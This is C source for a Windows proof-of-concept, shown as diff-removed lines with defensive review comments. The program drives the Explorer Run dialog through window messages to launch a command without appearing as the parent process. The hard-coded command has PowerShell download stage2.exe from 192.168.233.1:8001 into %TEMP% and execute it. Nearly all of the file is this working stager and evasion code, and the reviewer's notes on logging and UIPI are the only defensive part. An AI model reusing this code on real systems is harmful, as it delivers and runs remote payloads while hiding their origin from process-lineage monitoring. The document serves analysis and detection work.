- #define UNICODE
- #define _UNICODE
- #include <windows.h>
- #include <tchar.h>
- #pragma comment( lib, "user32" )
/*
 * _tmain: drives a Run-style shell dialog purely through window messages, so
 * that a command line is started without this process creating the child
 * process itself.
 *
 * Sequence visible below: attach the thread to the desktop named "Default",
 * read a string resource from explorer.exe to use as the dialog caption,
 * broadcast a WM_HOTKEY carrying MOD_WIN + 'R', wait for a dialog with that
 * caption, write a command into its edit control and click its OK button.
 * The command changes to %TEMP%, has PowerShell fetch stage2.exe over plain
 * HTTP from 192.168.233.1:8001 (an RFC 1918 private address) and launches it
 * through the Shell.Application COM object.
 *
 * Review notes (defensive):
 *  - The command is started by whichever process owns the dialog (presumably
 *    explorer.exe; confirm), so parent/child lineage will not point at this
 *    binary. Process-creation auditing with command lines and PowerShell
 *    script-block logging are where the download becomes visible.
 *  - The cross-process WM_SETTEXT / BM_CLICK sends are subject to UIPI and are
 *    rejected when the target window belongs to a higher-integrity process.
 *  - argc/argv are unused. Every path returns 0, so the exit code does not
 *    distinguish failure from success. hDesktop and hExplorer are never
 *    released (no CloseDesktop / FreeLibrary in this function).
 */
- int _tmain( int argc, TCHAR *argv[] )
- {
- HDESK hDesktop;
- HMODULE hExplorer;
/* These four hold window handles; they are declared HANDLE although the
 * window APIs used below return and accept HWND. */
- HANDLE hWnd, hComboBox, hEdit, hOkButton;
- TCHAR szRunDlgTitle[MAX_PATH];
/* Open the desktop object named "Default", non-inheritable (FALSE), asking
 * for the broadest access the caller is granted (MAXIMUM_ALLOWED). */
- hDesktop = OpenDesktop( _T( "Default"),
- 0,
- FALSE,
- MAXIMUM_ALLOWED );
- if ( NULL == hDesktop )
- {
- _tprintf( _T( "[-] OpenDesktop() failed (0x%08x)\n" ),
- GetLastError() );
- return 0;
- }
/* Bind the calling thread to that desktop so the window lookups and message
 * sends below operate on it. */
- if ( FALSE == SetThreadDesktop ( hDesktop ) )
- {
- _tprintf( _T( "[-] SetThreadDesktop() failed (0x%08x)\n" ),
- GetLastError() );
- return 0;
- }
/* Map explorer.exe as a data/resource image only: with these flags it is not
 * executed, it is only a source for LoadString. The bare file name is
 * resolved through the loader's search path rather than a fixed path. */
- hExplorer = LoadLibraryEx( _T( "explorer.exe" ),
- 0,
- LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE );
- if ( NULL == hExplorer )
- {
- _tprintf( _T( "[-] LoadLibrary() failed (0x%08x)\n" ),
- GetLastError() );
- return 0;
- }
/* String resource 722 becomes the caption searched for by FindWindow below.
 * The ID is hard-coded; presumably it is the Run dialog title for particular
 * explorer.exe builds (confirm). Reading it from the resource instead of
 * embedding text presumably keeps the match working on localized systems. */
- if ( 0 == LoadString( hExplorer,
- 722,
- szRunDlgTitle,
- _countof( szRunDlgTitle ) ) )
- {
- _tprintf( _T( "[-] LoadString() failed (0x%08x)\n" ),
- GetLastError() );
- return 0;
- }
/* Broadcast WM_HOTKEY (hotkey id 500, MOD_WIN + 'R') to top-level windows.
 * The return value is not checked; the apparent intent, judging by the
 * FindWindow loop that follows, is to make the shell open its Run dialog. */
- SendMessage( HWND_BROADCAST,
- WM_HOTKEY,
- 500,
- MAKELONG( MOD_WIN, 'R' ) );
/* Busy-poll with no sleep and no timeout until a dialog-class window with the
 * loaded caption exists. If none ever appears, this loop never exits and the
 * process keeps spinning. */
- do
- {
- hWnd = FindWindow( WC_DIALOG,
- szRunDlgTitle );
- }
- while ( NULL == hWnd );
/* Control IDs 12298 and 1001 are hard-coded dialog internals; going by the
 * variable names they are the combo box and its child edit control (confirm
 * against the dialog template). ID 1 is IDOK. */
- hComboBox = GetDlgItem( hWnd, 12298 );
- if ( NULL == hComboBox )
- {
- _tprintf( _T( "[-] GetDlgItem() failed (0x%08x)\n" ),
- GetLastError() );
- return 0;
- }
- hEdit = GetDlgItem( hComboBox, 1001 );
- if ( NULL == hEdit )
- {
- _tprintf( _T( "[-] GetDlgItem() failed (0x%08x)\n" ),
- GetLastError() );
- return 0;
- }
- hOkButton = GetDlgItem( hWnd, 1 );
- if ( NULL == hOkButton )
- {
- _tprintf( _T( "[-] GetDlgItem() failed (0x%08x)\n" ),
- GetLastError() );
- return 0;
- }
/* Replace the edit control's text with the command line. As written it runs
 * cmd.exe, changes directory to %TEMP%, downloads stage2.exe over unencrypted
 * HTTP with System.Net.WebClient and starts it with Shell.Application's
 * ShellExecute. The SendMessage result is not checked. */
- SendMessage( hEdit,
- WM_SETTEXT,
- 0,
- ( LPARAM )_T( "cmd.exe /c \"cd %TEMP%&PowerShell (New-Object System.Net.WebClient).DownloadFile('http://192.168.233.1:8001/stage2.exe','stage2.exe');(New-Object -com Shell.Application).ShellExecute('stage2.exe');\"" ) );
/* Force the OK button enabled if it is still disabled; presumably the dialog
 * has not re-evaluated its state after the programmatic WM_SETTEXT
 * (confirm). */
- if ( FALSE == IsWindowEnabled( hOkButton ) )
- {
- EnableWindow( hOkButton, TRUE );
- }
/* Simulate a click on OK so the dialog submits the text set above. */
- SendMessage( hOkButton,
- BM_CLICK,
- 0,
- 0 );
- return 0;
- }